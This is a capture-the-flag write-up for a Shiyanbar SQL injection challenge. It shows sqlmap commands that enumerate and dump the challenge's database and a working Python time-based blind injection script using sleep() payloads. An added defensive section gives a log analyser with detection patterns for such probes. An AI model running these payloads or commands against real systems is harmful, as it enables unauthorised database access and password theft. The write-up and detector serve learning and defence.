【fairy】Shiyanbar: this one looks a bit hard
阿新 • Published: 2018-12-12
Challenge link: ctf5.shiyanbar.com/basic/inject/index.php
It looks like an injection challenge; I'm not very skilled, so I just went straight to sqlmap = =
1) Enumerate databases: sqlmap -u "ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --dbs
2) Enumerate tables: sqlmap -u "ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --tables -D test
3) Dump the columns: sqlmap -u "ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --dump -T admin -D test
Password obtained: idnuenna. Log in with it to get the key.
4) Finally, here is an expert's exp (the time-based blind injection script that extracts the password one character at a time):
```python
# -*- coding: utf-8 -*-
import requests
import time

# Candidate characters tried at each position; '*' is the end-of-string sentinel.
# NOTE: this literal was garbled by the page's e-mail obfuscation ("[email protected]");
# in the original it enumerated the candidate characters before "@_.{}*".
payloads = '[email protected]_.{}*'  # case-insensitive
flag = ""
key = 0
print("Start")
for i in range(1, 50):
    if key == 1:
        break
    for payload in payloads:
        starttime = time.time()  # record the current time
        headers = {
            "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour",
            "Connection": "keep-alive",
        }
        # The condition compares one character of the password; a correct guess makes
        # the database sleep 10 s, which is the only signal this blind injection gets back.
        url = ("http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when"
               "(substr(password,%s,1)='%s') then sleep(10) else sleep(0) end and ''='"
               "&pass=&action=login" % (i, payload))
        res = requests.get(url, headers=headers)
        if time.time() - starttime > 10:
            flag += payload
            print("pwd is:%s" % flag)
            break
        else:
            if payload == '*':
                # No candidate matched at this position: the password has ended.
                key = 1
                break
print('[Finally] current pwd is %s' % flag)
```
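From the defender's side, as an added example that is not part of the original writeup: the script above leaves a very recognisable trace in web-server access logs (a delay primitive wrapped in a conditional, repeated once per candidate character, with one slow response per position). The log format with a trailing response time and the sample lines below are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines (hypothetical format: Common Log Format plus a trailing response
# time in seconds). Lines 2 and 3 carry the writeup's sleep() probe; on line 3 the guessed
# character was right, so the server stalled for about 10 s.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2018:10:01:02 +0800] "GET /basic/inject/index.php?admin=admin&pass=admin&action=login HTTP/1.1" 200 512 0.031
10.0.0.5 - - [12/Dec/2018:10:01:05 +0800] "GET /basic/inject/index.php?admin=admin%27%20and%20case%20when(substr(password,1,1)=%27a%27)%20then%20sleep(10)%20else%20sleep(0)%20end%20and%20%27%27=%27&pass=&action=login HTTP/1.1" 200 512 0.029
10.0.0.5 - - [12/Dec/2018:10:01:16 +0800] "GET /basic/inject/index.php?admin=admin%27%20and%20case%20when(substr(password,1,1)=%27i%27)%20then%20sleep(10)%20else%20sleep(0)%20end%20and%20%27%27=%27&pass=&action=login HTTP/1.1" 200 512 10.040
10.0.0.9 - - [12/Dec/2018:10:02:00 +0800] "GET /index.php?page=about HTTP/1.1" 200 2048 0.012
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ (?P<rt>[\d.]+)$'
)
# Delay primitives of common engines, and the conditional wrapper the probe puts around them.
DELAY_RE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I)
COND_RE = re.compile(r"\bcase\s+when\b|\bsubstr(ing)?\s*\(", re.I)

def decode_uri(uri, rounds=2):
    """URL-decode up to `rounds` times so double-encoded payloads are still visible."""
    for _ in range(rounds):
        decoded = unquote_plus(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

def analyse(log_text, slow_threshold=5.0):
    """Return (ip, verdict, decoded_uri) for requests that look like time-based blind probes:
    a delay primitive plus a conditional wrapper, 'confirmed' when the server actually stalled."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = decode_uri(m.group("uri"))
        if DELAY_RE.search(uri) and COND_RE.search(uri):
            slow = float(m.group("rt")) >= slow_threshold
            verdict = "blind-sqli-probe-confirmed" if slow else "blind-sqli-probe"
            findings.append((m.group("ip"), verdict, uri))
    return findings

def probes_per_source(findings):
    """Count probes per client IP; character-by-character extraction shows up as a long run."""
    return dict(Counter(ip for ip, _, _ in findings))
```

The response-time check matters: a request that merely contains sleep() is a probe, but a slow response on such a request means the condition was true and a character of the secret has leaked, which is the event worth alerting on.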